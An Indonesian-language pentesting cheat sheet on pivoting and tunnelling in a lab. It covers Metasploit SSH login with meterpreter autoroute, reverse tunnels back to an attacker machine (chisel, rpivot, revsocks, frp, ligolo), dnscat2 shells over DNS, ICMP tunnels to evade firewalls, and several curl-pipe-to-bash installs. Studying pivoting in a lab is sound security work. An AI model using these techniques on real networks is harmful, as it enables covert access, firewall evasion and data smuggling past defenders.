Hanya sebagai referensi
Sumber: IGNITE Technologies — hackingarticles.in
Port forwarding adalah aturan di router yang meneruskan lalu lintas data dari internet (luar) langsung ke perangkat tertentu di jaringan lokal (dalam) berdasarkan nomor port-nya. Tujuannya agar perangkat di jaringan lokal (seperti server game, CCTV, atau website) bisa diakses dari internet.
# Di Kali — login SSH ke Ubuntu via Metasploit
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.108
set username raj
set password 123
exploit
sessions -u 1 # Upgrade ke meterpreter
sessions 2
netstat -antp # Konfirmasi port 8080 di localhost Ubuntu
# Forward port 8080 Ubuntu ke port 8081 Kali
portfwd add -l 8081 -p 8080 -r 127.0.0.1
Akses di Kali: http://127.0.0.1:8081
# Di Kali
ssh -L 8081:localhost:8080 -N -f -l raj 192.168.1.108
| Flag | Fungsi |
|---|---|
-L 8081:localhost:8080 |
Forward port lokal 8081 ke remote 8080 |
-N |
Tidak eksekusi command, hanya forward |
-f |
Background mode |
-l raj |
Username |
Akses di Kali: http://127.0.0.1:8081
# Di Ubuntu — redirect semua koneksi ke 127.0.0.1:8080 via port 1234
socat TCP-LISTEN:1234,fork,reuseaddr tcp:127.0.0.1:8080 &
Akses di Kali: http://192.168.1.108:1234
Ini seperti membuat terowongan terenkripsi di dalam jaringan publik, seringkali untuk menyelundupkan data atau mengakses layanan yang diblokir.
Cara kerja: Komputer membuat koneksi aman ke server di internet. Lalu, semua data dari aplikasi dikirim lewat terowongan ini dan keluar dari server tersebut, bukan dari koneksi internet langsung.
Buat VPN-like tunnel melalui SSH. Tidak perlu install agen di remote.
# Di Kali
apt install sshuttle
# Tunnel ke subnet Metasploitable 2 via Ubuntu
sshuttle -r raj@192.168.1.108 192.168.226.0/24
Setelah connect, akses langsung: http://192.168.226.129 dari browser Kali.
Seluruh subnet:
sshuttle -r raj@192.168.1.108 0.0.0.0/0 --exclude 192.168.1.0/24
Kali (server):
git clone https://github.com/jpillora/chisel.git
apt install golang
cd chisel
go build -ldflags="-s -w"
./chisel server -p 8000 --reverse
Ubuntu (client):
git clone https://github.com/jpillora/chisel.git
apt install golang
cd chisel
go build -ldflags="-s -w"
# Forward port 80 Metasploitable 2 ke port 5000 Kali
./chisel client 192.168.1.2:8000 R:5000:192.168.226.129:80
Akses di Kali: http://127.0.0.1:5000
Binary prebuilt (tanpa compile):
# Download dari releases
curl -L https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz | gunzip > chisel
chmod +x chisel
Kali (server):
./chisel server -p 8000 --reverse
Ubuntu (client — buat SOCKS5 listener di Kali port 1080):
./chisel client 192.168.1.2:8000 R:socks
Ubuntu (opsional — SOCKS5 via Metasploitable 2):
./chisel client 192.168.1.2:8000 R:8001:192.168.226.129:9001
./chisel server -p 9001 --socks5
Konfigurasi browser Kali:
SOCKS Host : 127.0.0.1
Port : 1080
Tipe : SOCKS5
No proxy : 127.0.0.1
Reverse SOCKS4 proxy. Arah kebalikan dari SSH dynamic forwarding.
Kali (server):
git clone https://github.com/klsecservices/rpivot.git
cd rpivot
python server.py --server-port 9999 --server-ip 192.168.1.2 --proxy-ip 127.0.0.1 --proxy-port 1080
Ubuntu (client):
git clone https://github.com/klsecservices/rpivot.git
cd rpivot
python client.py --server-ip 192.168.1.2 --server-port 9999
Konfigurasi browser Kali:
SOCKS Host : 127.0.0.1
Port : 1080
Tipe : SOCKS4
No proxy : 127.0.0.1
SSH bertindak sebagai SOCKS proxy. Mendukung multi-port secara dinamis.
# Di Kali
ssh -D 7000 raj@192.168.1.108
Konfigurasi browser Kali:
SOCKS Host : 127.0.0.1
Port : 7000
Tipe : SOCKS5
No proxy : 127.0.0.1
Background mode:
ssh -D 7000 -N -f raj@192.168.1.108
Forward satu port spesifik dari Metasploitable 2 melalui Ubuntu.
# Di Kali — akses port 80 Metasploitable 2 via Ubuntu, bind ke lokal port 7000
ssh -L 7000:192.168.226.129:80 raj@192.168.1.108
Akses di Kali: http://127.0.0.1:7000
Multiple port sekaligus:
ssh -L 7000:192.168.226.129:80 -L 7022:192.168.226.129:22 raj@192.168.1.108
Command-line PuTTY untuk Windows sebagai pengganti ssh.
plink.exe -L 7000:192.168.226.129:80 raj@192.168.1.108
Akses di Windows browser: http://127.0.0.1:7000
Tanpa prompt host key (non-interaktif):
echo y | plink.exe -L 7000:192.168.226.129:80 raj@192.168.1.108
plink.exe -D 8000 raj@192.168.1.108
Konfigurasi browser Windows:
SOCKS Host : 127.0.0.1
Port : 8000
Tipe : SOCKS5
No proxy : 127.0.0.1
Reverse SOCKS5 tunneler. Berguna saat target berada di balik NAT/firewall.
Windows (listener):
revsocks_windows_amd64.exe -listen :8443 -socks 0.0.0.0:1080 -pass test
Ubuntu/Linux (connect ke listener):
./revsocks_linux_amd64 -connect 192.168.1.3:8443 -pass test
Konfigurasi browser:
SOCKS Host : 127.0.0.1
Port : 1080
Tipe : SOCKS5
No proxy : 127.0.0.1
Download: https://github.com/kost/revsocks/releases
msfconsole
# Setup session meterpreter (via SSH login)
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.108
set username raj
set password 123
exploit
sessions -u 1
# Autoroute ke subnet Metasploitable 2
use post/multi/manage/autoroute
set session 2
exploit
# Jalankan SOCKS5 proxy
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 5
exploit -j
Konfigurasi browser:
SOCKS Host : 127.0.0.1
Port : 1080
Tipe : SOCKS5
# Lanjutan dari autoroute session di atas
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 4a
exploit -j
Konfigurasi browser:
SOCKS Host : 127.0.0.1
Port : 1080
Tipe : SOCKS4
Catatan: Module
socks4adansocks5lama sudah deprecated. Gunakanauxiliary/server/socks_proxydan setVERSION.
Tunnel data melalui protokol DNS (UDP 53). Efektif melewati firewall yang hanya allow DNS.
Kali (server):
apt install dnscat2
dnscat2-server
Ubuntu (client):
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client
make
./dnscat --dns=server=192.168.1.2,port=53
Di Kali — interaksi session:
dnscat2> session
dnscat2> session -i 1
command (ubuntu) 1> shell
command (ubuntu) 1> session -i 2
# Buat listener — forward port SSH Metasploitable 2
command (ubuntu) 1> listen 127.0.0.1:8888 192.168.226.129:22
Di tab baru Kali:
ssh msfadmin@127.0.0.1 -p 8888
# Lanjutan dari session DNScat2 yang aktif
command (ubuntu) 1> listen 127.0.0.1:9999 192.168.226.129:80
Akses di Kali: http://127.0.0.1:9999
Enkapsulasi TCP/SSH di dalam paket ICMP. Berguna saat hanya ICMP yang diizinkan.
Ubuntu (server/pivot):
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
# Nonaktifkan ICMP echo reply agar kernel tidak membalas sendiri
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./icmptunnel -s &
# Assign IP ke tunnel interface
/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
Kali (client):
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./icmptunnel 192.168.1.108 &
/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0
Verifikasi tunnel aktif:
ping 10.0.0.1 # Dari Kali ke Ubuntu via ICMP tunnel
SSH melalui ICMP tunnel:
ssh raj@10.0.0.1
Wireshark akan menunjukkan traffic SSH berjalan di atas ICMP.
Expose port lokal ke internet via relay. Tidak perlu akun, tidak perlu kartu kredit.
# Install
curl -L https://webrelay.io/get | bash
# Expose HTTP lokal port 8080
relay connect --name myapp 8080
# Output:
# https://myapp.webrelay.io -> localhost:8080
Expose SSH untuk remote access:
relay connect --protocol tcp 22
# Output: tcp://randomid.webrelay.io:xxxxx -> localhost:22
Tanpa install (Docker):
docker run -it webrelay/cli connect 8080
Dokumentasi: https://webrelay.io/docs
Tunnelling modern tanpa proxychains. Mendukung multi-session dan routing subnet penuh. Performa tinggi, tidak butuh agent berbasis Python/Ruby.
Download:
# Di Kali
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_linux_amd64.tar.gz
tar xzf ligolo-ng_proxy_linux_amd64.tar.gz
# Untuk Ubuntu/target
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_agent_linux_amd64.tar.gz
tar xzf ligolo-ng_agent_linux_amd64.tar.gz
Kali (proxy server):
# Buat tun interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
Ubuntu (agent):
./agent -connect 192.168.1.2:11601 -ignore-cert
Di Kali — console ligolo:
ligolo-ng » session # Pilih session
[Agent : ubuntu] » ifconfig # Lihat subnet target
[Agent : ubuntu] » start # Mulai tunnel
# Di terminal Kali — tambah route
sudo ip route add 192.168.226.0/24 dev ligolo
Setelah itu akses 192.168.226.129 langsung dari Kali tanpa proxychains.
Tunnel TCP sederhana. Self-hosted atau pakai server publik bore.pub.
# Install
cargo install bore-cli
# atau
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz | tar xz
# Expose port lokal 8080 ke internet (gratis, tanpa akun)
bore local 8080 --to bore.pub
# Output: bore.pub:PORT -> localhost:8080
Self-hosted server:
# Di VPS
bore server
# Di client
bore local 8080 --to your-vps.com
# Install
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc
echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list
sudo apt update && sudo apt install ngrok
# Konfigurasi token, ambil di dashboard ngrok
ngrok config add-authtoken TOKEN
# Expose HTTP
ngrok http 8080
# Expose TCP (SSH)
ngrok tcp 22
Untuk pakai TCP Butuh kartu kredit
Tunnel permanen via Cloudflare. Gratis, tidak butuh IP publik, tidak butuh CC.
# Install
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
dpkg -i cloudflared-linux-amd64.deb
# Quick tunnel (tanpa akun)
cloudflared tunnel --url http://localhost:8080
# Output: https://random-name.trycloudflare.com
# Tunnel persistent (butuh akun Cloudflare gratis)
cloudflared tunnel login
cloudflared tunnel create mylab
cloudflared tunnel route dns mylab lab.domain.com
cloudflared tunnel run mylab
Self-hosted reverse proxy. Perlu VPS sebagai server.
Di VPS (frps.toml):
bindPort = 7000
./frps -c frps.toml
Di target/Ubuntu (frpc.toml):
serverAddr = "VPS_IP"
serverPort = 7000
[[proxies]]
name = "ssh"
type = "tcp"
localIP = "127.0.0.1"
localPort = 22
remotePort = 6022
[[proxies]]
name = "web"
type = "tcp"
localIP = "127.0.0.1"
localPort = 8080
remotePort = 6080
[[proxies]]
name = "socks5"
type = "tcp"
localIP = "127.0.0.1"
localPort = 1080
remotePort = 1080
./frpc -c frpc.toml
Di Kali:
ssh -p 6022 raj@VPS_IP # SSH ke Ubuntu via VPS
# atau akses http://VPS_IP:6080
Jalankan tool apapun melalui SOCKS proxy yang sudah dibuat.
# Edit config
nano /etc/proxychains4.conf
# Akhir file — sesuaikan dengan proxy yang aktif:
socks5 127.0.0.1 1080 # Chisel / Metasploit SOCKS5
# atau
socks4 127.0.0.1 1080 # Rpivot / SOCKS4a
Penggunaan:
proxychains nmap -sT -Pn -p 80,22,443 192.168.226.129
proxychains curl http://192.168.226.129
proxychains ssh msfadmin@192.168.226.129
proxychains firefox &
Dynamic chain (multi-hop):
# proxychains4.conf
dynamic_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 1080
socks5 10.0.0.1 1081
| Setup | SOCKS Host | Port | Tipe |
|---|---|---|---|
| Chisel R:socks | 127.0.0.1 | 1080 | SOCKS5 |
| Dynamic SSH | 127.0.0.1 | 7000 | SOCKS5 |
| Rpivot | 127.0.0.1 | 1080 | SOCKS4 |
| Metasploit SOCKS5 | 127.0.0.1 | 1080 | SOCKS5 |
| Metasploit SOCKS4a | 127.0.0.1 | 1080 | SOCKS4 |
| Revsocks | 127.0.0.1 | 1080 | SOCKS5 |
| Plink Dynamic | 127.0.0.1 | 8000 | SOCKS5 |
“No Proxy for” selalu isi: 127.0.0.1,localhost